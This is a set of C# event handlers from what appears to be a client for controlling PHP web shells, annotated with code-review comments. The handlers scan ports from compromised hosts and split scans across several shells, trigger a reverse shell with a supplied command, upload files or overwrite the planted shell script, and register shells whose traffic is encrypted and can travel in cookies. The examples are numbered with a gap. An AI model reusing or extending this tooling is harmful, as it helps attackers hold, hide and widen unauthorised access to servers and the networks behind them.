Example #1
        /// <summary>
        /// Main port scan routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
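        private async void btnScan_Click(object sender, EventArgs e)
        {
            // Click handler for the scan button. Validates the host and port fields, builds a
            // PHP port-list snippet and passes the PhpBuilder.PortScanner output to
            // BantamMain.ExecutePHPCodeDisplayInRichTextBox for the shell keyed by ShellUrl.
            // NOTE(review): the method is async but contains no await; whether the request has
            // finished by the time the button is re-enabled depends on that helper - confirm.
            const int maxPort = 65535;

            // A disabled button means this handler is already running.
            if (!btnScan.Enabled)
            {
                return;
            }

            string target = textBoxHost.Text;

            // Reject an empty host as well as one that is neither a valid IPv4 address nor a
            // valid URI. The previous condition joined all three tests with &&, so every
            // non-empty string passed validation and reached the PHP builder unchecked.
            if (string.IsNullOrEmpty(target) ||
                (!Helper.IsValidIPv4(target) && !Helper.IsValidUri(target)))
            {
                labelDynStatus.Text = "Invalid IP/Url.";
                return;
            }

            btnScan.Enabled = false;

            try
            {
                // One lookup instead of ContainsKey followed by two indexer reads.
                if (!BantamMain.Shells.TryGetValue(ShellUrl, out var shellInfo))
                {
                    return;
                }

                bool encryptResponse        = shellInfo.ResponseEncryption;
                int  responseEncryptionMode = shellInfo.ResponseEncryptionMode;

                // As in the original, nothing is sent unless the ports box holds an integer.
                if (!int.TryParse(textBoxPorts.Text, out int port))
                {
                    return;
                }

                // int.TryParse also accepts signs and out-of-range values; keep only real ports.
                if (port < 1 || port > maxPort)
                {
                    labelDynStatus.Text = "Invalid port.";
                    return;
                }

                string portsCode = string.Empty;

                if (!string.IsNullOrEmpty(textBoxPorts.Text))
                {
                    // Emit the parsed integer rather than the raw text box content, so only
                    // digits are ever concatenated into the generated PHP source.
                    portsCode           = "$ports = array('" + port.ToString(System.Globalization.CultureInfo.InvariantCulture) + "');";
                    labelDynStatus.Text = "";
                }
                else
                {
                    // NOTE(review): unreachable as written - a successful int.TryParse above
                    // implies the text box is not empty, so the preset list is never selected.
                    if (comboBoxCommonPorts.SelectedIndex != 0)
                    {
                        if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ONE_TO_1024)
                        {
                            portsCode           = PhpBuilder.PortsScannerPorts1To1024();
                            labelDynStatus.Text = "** May fail unless on local IP";
                        }
                        else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.COMMON_PORTS)
                        {
                            labelDynStatus.Text = "** May fail unless on local IP";
                            portsCode           = PhpBuilder.PortScannerPortsCommon();
                        }
                        else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ALL_PORTS)
                        {
                            portsCode           = PhpBuilder.PortScannerPortsAll();
                            labelDynStatus.Text = "** May fail unless on local IP";
                        }
                    }
                }

                string phpCode = PhpBuilder.PortScanner(target, portsCode, encryptResponse);
                BantamMain.ExecutePHPCodeDisplayInRichTextBox(ShellUrl, phpCode, "Opened Ports - " + target, encryptResponse, responseEncryptionMode);
            }
            finally
            {
                // Restore the button on every exit path, including exceptions.
                btnScan.Enabled = true;
            }
        }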
Example #2
        /// <summary>
        /// Task wrapper for popping reverse shell without chankro
        /// </summary>
        /// <param name="shellCode"></param>
        private async Task PopReverseShell(string shellCode)
        {
            // Wrap the caller-supplied command string in PHP via PhpBuilder.ExecuteSystemCode;
            // the meaning of the second argument (false) is defined in PhpBuilder.
            string phpCode = PhpBuilder.ExecuteSystemCode(shellCode, false);

            // NOTE(review): the lambda returns the awaitable produced by ConfigureAwait(false),
            // not the Task from ExecuteRemotePHP. Task.Run therefore presumably completes as
            // soon as the request has been started, so this await neither waits for the
            // request to finish nor observes its exceptions - confirm this is intended.
            await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode, true).ConfigureAwait(false));

            // Optional audit entry: records the shell URL and the full command string.
            // NOTE(review): the message says "chankro" although the summary describes the
            // non-chankro path - confirm which wording is correct.
            if (checkBoxLogShellCode.Checked)
            {
                LogHelper.AddShellLog(ShellUrl, "Attempted to pop chankro reverse shell with [ " + shellCode + " ] ", LogHelper.LOG_LEVEL.REQUESTED);
            }
        }
Example #3
        /// <summary>
        /// Main upload routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
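        private async void btnUpload_Click(object sender, EventArgs e)
        {
            // Click handler for the upload button. Base64-encodes either the editor text or a
            // local file, wraps it in a PHP file-write snippet from PhpBuilder and sends it to
            // the shell at ShellUrl. The form closes once the request has been awaited.

            // Toggles the three inputs together. The original early-return paths re-enabled
            // only btnUpload, leaving btnBrowse and richTextBox1 disabled.
            void SetInputsEnabled(bool enabled)
            {
                btnBrowse.Enabled    = enabled;
                btnUpload.Enabled    = enabled;
                richTextBox1.Enabled = enabled;
            }

            string phpCode;

            SetInputsEnabled(false);

            if (EditingSelf)
            {
                // Self-edit mode: the editor text replaces the server-side script itself.
                if (string.IsNullOrEmpty(richTextBox1.Text))
                {
                    LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data to self...", LogHelper.LOG_LEVEL.INFO);
                    SetInputsEnabled(true);
                    return;
                }

                string encodedText = Helper.EncodeBase64ToString(richTextBox1.Text);
                phpCode = PhpBuilder.WriteFileVar(PhpBuilder.phpServerScriptFileName, encodedText);
            }
            else
            {
                string encodedContent;

                // A selected local file takes precedence over the editor text.
                if (!string.IsNullOrEmpty(LocalFileLocation))
                {
                    // NOTE(review): File.ReadAllBytes can throw (missing file, access denied);
                    // in an async void handler that exception is not caught here.
                    encodedContent = Convert.ToBase64String(File.ReadAllBytes(LocalFileLocation));
                }
                else if (!string.IsNullOrEmpty(richTextBox1.Text))
                {
                    encodedContent = Helper.EncodeBase64ToString(richTextBox1.Text);
                }
                else
                {
                    LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data...", LogHelper.LOG_LEVEL.INFO);
                    SetInputsEnabled(true);
                    return;
                }

                // The remote path is ServerPath joined with the file-name text box as typed.
                string remoteFileLocation = ServerPath + "/" + txtBoxFileName.Text;
                phpCode = PhpBuilder.WriteFile(remoteFileLocation, encodedContent);
            }

            try
            {
                await WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode);
            }
            finally
            {
                // Re-enable the inputs even when the request throws.
                SetInputsEnabled(true);
            }

            this.Close();
        }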
        /// <summary>
        /// Main Distributed scanning routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
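        private async void btnScan_Click(object sender, EventArgs e)
        {
            // Click handler for the distributed scan button. Validates the target and the port
            // range, splits the range into one slice per checked shell and hands each shell a
            // PhpBuilder.PortScanner snippet for its slice. All results share one dialog.
            // NOTE(review): the method is async but contains no await; the button is
            // re-enabled once every request has been dispatched, not once they complete.
            string target = textBoxTarget.Text;

            if (string.IsNullOrEmpty(target) ||
                (!Helper.IsValidIPv4(target) && !Helper.IsValidUri(target)))
            {
                lblStatus.Text = "Invalid IP/Url.";
                return;
            }

            // TryParse replaces Convert.ToInt32, which threw FormatException/OverflowException
            // on non-numeric or oversized input; empty boxes also fail the parse.
            if (!int.TryParse(textBoxStartPort.Text, out int startPort) ||
                !int.TryParse(textBoxEndPort.Text, out int endPort) ||
                startPort > endPort ||
                endPort <= 0 || startPort <= 0 ||
                startPort > PORT_MAX || endPort > PORT_MAX)
            {
                lblStatus.Text = "Invalid port.";
                return;
            }

            // With nothing checked the division below threw DivideByZeroException.
            int shellsCount = checkedListBoxShells.CheckedItems.Count;
            if (shellsCount == 0)
            {
                lblStatus.Text = "No shells selected.";
                return;
            }

            btnScan.Enabled = false;

            try
            {
                string      windowTitle = "Open Ports ( " + target + " )";
                RichTextBox rtb         = GuiHelper.RichTextBoxDialog(windowTitle, string.Empty);

                int portsPerShell = (endPort - startPort) / shellsCount;
                int iter          = 1;

                foreach (var checkedItem in checkedListBoxShells.CheckedItems)
                {
                    // The first slice starts at startPort and the last one ends at endPort.
                    // Every other bound is a multiple of portsPerShell counted from 1, exactly
                    // as in the original code, i.e. it is not offset by startPort.
                    int rangeStart = iter == 1 ? startPort : ((iter - 1) * portsPerShell) + 1;
                    int rangeEnd   = iter == shellsCount ? endPort : iter * portsPerShell;

                    string scannedRange = rangeStart.ToString() + ", " + rangeEnd.ToString();
                    string portsCode    = "$ports = range(" + scannedRange + ");";

                    // Response encryption is always on for distributed scans.
                    bool   encryptResponse = true;
                    string shellUrl        = checkedListBoxShells.GetItemText(checkedItem);

                    string responseText = "[" + shellUrl + "] - returned ports (" + scannedRange + ") - \r\n";
                    string phpCode      = PhpBuilder.PortScanner(target, portsCode, encryptResponse);

                    lblStatus.Text = "Scanning.";

                    BantamMain.ExecutePHPCodeDisplayInRichTextBox(shellUrl, phpCode, windowTitle, encryptResponse, (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL, false, rtb, responseText);

                    iter++;
                }
            }
            finally
            {
                // Previously set inside the loop, so the button came back after the first
                // shell had been handled rather than after all of them.
                btnScan.Enabled = true;
            }
        }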
Example #5
        /// <summary>
        /// Main add shell/host To GUI routine
        /// </summary>
        /// <param name="sender"></param>
        /// <param name="e"></param>
        private async void btnAddShell_Click(object sender, EventArgs e)
        {
            // Click handler that registers a shell URL: validates the form, replaces any
            // existing entry in BantamMain.Shells, copies the transport settings from the
            // controls, then sends a test snippet and keeps the entry only if it answers "1".
            string shellURL = txtBoxShellUrl.Text;
            bool   wantsRequestEncryption = checkBoxEncryptRequest.Checked;

            if (string.IsNullOrEmpty(shellURL))
            {
                return;
            }

            // Key and IV are taken as typed: 32 and 16 characters respectively.
            if (wantsRequestEncryption)
            {
                if (textBoxEncrpytionKey.Text.Length != 32)
                {
                    labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
                    return;
                }

                // A fixed IV is required only when it is not sent with each request.
                if (!checkBoxSendIVInRequest.Checked)
                {
                    string fixedIV = textBoxEncrpytionIV.Text;
                    bool   ivValid = !string.IsNullOrEmpty(fixedIV) && fixedIV.Length == 16;

                    if (!ivValid)
                    {
                        labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
                        return;
                    }
                }
            }

            // Drop a previous registration for the same URL (GUI first, then the map).
            if (BantamMain.Shells.ContainsKey(shellURL))
            {
                BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);

                bool removed = BantamMain.Shells.TryRemove(shellURL, out ShellInfo previousInfo);
                if (!removed)
                {
                    LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                    return;
                }
            }

            // Register a fresh entry.
            bool added = BantamMain.Shells.TryAdd(shellURL, new ShellInfo());
            if (!added)
            {
                LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
                return;
            }

            // Fetch the new entry once and fill it in from the form controls.
            ShellInfo shell = BantamMain.Shells[shellURL];

            shell.RequestArgName = txtBoxArgName.Text;

            if (comboBoxVarType.Text == "cookie")
            {
                shell.SendDataViaCookie = true;
            }

            if (checkBoxResponseEncryption.Checked)
            {
                shell.ResponseEncryption     = true;
                shell.ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
            }
            else
            {
                shell.ResponseEncryption = false;
            }

            shell.GzipRequestData = checkBoxGZipRequest.Checked;

            bool encryptResponse        = shell.ResponseEncryption;
            int  responseEncryptionMode = shell.ResponseEncryptionMode;

            if (!wantsRequestEncryption)
            {
                // Request encryption off: clear every related setting.
                shell.RequestEncryption                 = false;
                shell.RequestEncryptionIVRequestVarName = string.Empty;
                shell.RequestEncryptionIV               = string.Empty;
                shell.RequestEncryptionKey              = string.Empty;
            }
            else
            {
                shell.RequestEncryption    = true;
                shell.RequestEncryptionKey = textBoxEncrpytionKey.Text;

                if (checkBoxSendIVInRequest.Checked)
                {
                    // The IV travels with each request under the configured variable name.
                    shell.SendRequestEncryptionIV           = true;
                    shell.RequestEncryptionIV               = string.Empty;
                    shell.RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
                }
                else
                {
                    // NOTE(review): with a fixed key and IV, identical requests presumably
                    // encrypt to identical bytes - confirm in CryptoHelper.
                    shell.RequestEncryptionIV               = textBoxEncrpytionIV.Text;
                    shell.RequestEncryptionIVRequestVarName = string.Empty;
                }
            }

            // Shared failure path: report to the user and unregister the entry again.
            void RejectShell()
            {
                labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
                BantamMain.Shells.TryRemove(shellURL, out ShellInfo discardedInfo);
            }

            // Connectivity check: the test snippet is expected to come back as "1".
            string         phpCode  = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
            ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);

            if (string.IsNullOrEmpty(response.Result))
            {
                RejectShell();
                return;
            }

            string result = encryptResponse
                ? CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, responseEncryptionMode)
                : response.Result;

            // A null or empty result also fails this comparison.
            if (result != "1")
            {
                RejectShell();
                return;
            }

            BantamMain.Instance.InitializeShellData(shellURL);

            this.Close();
        }